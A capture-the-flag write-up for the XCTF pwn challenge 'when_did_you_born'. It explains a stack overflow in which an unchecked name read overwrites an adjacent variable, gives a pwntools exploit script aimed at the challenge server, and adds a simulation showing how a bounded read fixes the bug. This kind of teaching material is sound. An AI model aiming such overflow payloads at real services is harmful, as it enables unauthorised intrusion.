XCTF - pwn when_did_you_born - WP
2020-02-03 04:37
1. First pull the binary into the VM and run it to see how it behaves.
2. Check the file format: it is a 64-bit binary with canary and NX enabled. Neither protection matters much here, because the overflow only needs to reach an adjacent local variable, not the return address, and no shellcode is executed.
3. Decompile it with ida64 and look at main. It is easy to see that once execution enters the else branch, making v6 equal to 1926 yields the flag.
4. The problem is that v6 must not be 1926 at the first check but must be 1926 at the second check. Looking at the variable definitions above, v5 is at offset 20h and v6 at 18h (both relative to rbp). The second input is read into v5 without a length limit, so we can build an exp that uses it to overwrite v6 with 1926. The two variables are 8 bytes apart, so the payload is 8 filler bytes followed by 1926 as a little-endian qword.
5. Exploit script:

```python
#!/usr/bin/env python
from pwn import *

# v5 - rbp-20h: 8-byte name buffer, read without a length check
# v6 - rbp-18h: birth year, sits 8 bytes above v5
# result = 1926
payload = b'a' * 8 + p64(1926)   # fill v5, then overwrite v6 with 1926

r = remote("111.198.29.45", 57262)
r.recvuntil(b"Birth?")
r.sendline(b"2000")              # anything except 1926 so the first check passes
r.recvuntil(b"Name?")
r.sendline(payload)              # second input overflows v5 into v6
r.interactive()
```
6. Run the script and the flag is printed.
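To make the stack layout in steps 4 and 5 concrete without touching the challenge server, here is an added simulation (not part of the original write-up or the challenge) that models the frame as a byte array: an 8-byte name buffer v5 at rbp-0x20 directly below the birth year v6 at rbp-0x18. The offsets come from the write-up; the frame size, the assumption that v6 is read as an 8-byte integer, and the `unbounded_write`/`bounded_write`/`run` helpers are constructed for illustration. It shows the same payload landing 1926 in v6 through an unchecked copy, and failing to do so when the copy is bounded to the buffer size, which is the fix a defender would apply.

```python
#!/usr/bin/env python3
"""Stack-layout model for the when_did_you_born overflow (added example).

Constructed simulation: the frame, write helpers and checks are assumptions,
only the offsets (v5 at rbp-0x20, v6 at rbp-0x18) come from the write-up.
"""
import struct

FRAME_SIZE = 0x20            # bytes below rbp that we model (assumed)
V5_OFF = FRAME_SIZE - 0x20   # name buffer at rbp-0x20 -> index 0
V6_OFF = FRAME_SIZE - 0x18   # birth year at rbp-0x18 -> index 8
V5_SIZE = V6_OFF - V5_OFF    # 8 bytes separate the two variables
TARGET = 1926


def build_payload(value=TARGET):
    """8 filler bytes to cross v5, then the little-endian qword that lands in v6."""
    return b"a" * V5_SIZE + struct.pack("<Q", value)


def new_frame(birth_year):
    """Frame after the first scanf: v6 holds the year, v5 is still zeroed."""
    frame = bytearray(FRAME_SIZE)
    frame[V6_OFF:V6_OFF + 8] = struct.pack("<q", birth_year)  # 8-byte v6 assumed
    return frame


def read_v6(frame):
    return struct.unpack("<q", frame[V6_OFF:V6_OFF + 8])[0]


def unbounded_write(frame, data):
    """gets()-style copy: writes every byte, running past the end of v5."""
    end = min(V5_OFF + len(data), FRAME_SIZE)  # clip to the modelled frame
    frame[V5_OFF:end] = data[:end - V5_OFF]


def bounded_write(frame, data):
    """fgets()/read(size)-style copy: never writes beyond the 8 bytes of v5."""
    frame[V5_OFF:V5_OFF + V5_SIZE] = data[:V5_SIZE].ljust(V5_SIZE, b"\0")


def run(birth_year, name, writer):
    """Mirror the binary's two checks around the name input."""
    frame = new_frame(birth_year)
    if read_v6(frame) == TARGET:
        return "rejected"            # first check: 1926 is refused up front
    writer(frame, name)              # second input lands in v5
    return "flag" if read_v6(frame) == TARGET else "no flag"


if __name__ == "__main__":
    print("payload:", build_payload().hex())
    print("unbounded:", run(2000, build_payload(), unbounded_write))
    print("bounded:  ", run(2000, build_payload(), bounded_write))
```

The only difference between the two outcomes is the write helper: the payload is identical, and the bounded copy simply has no way to reach v6, which is why length-checking the read into v5 closes the bug.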
Reposted from: https://www.cnblogs.com/Tsuiyields/p/11515377.html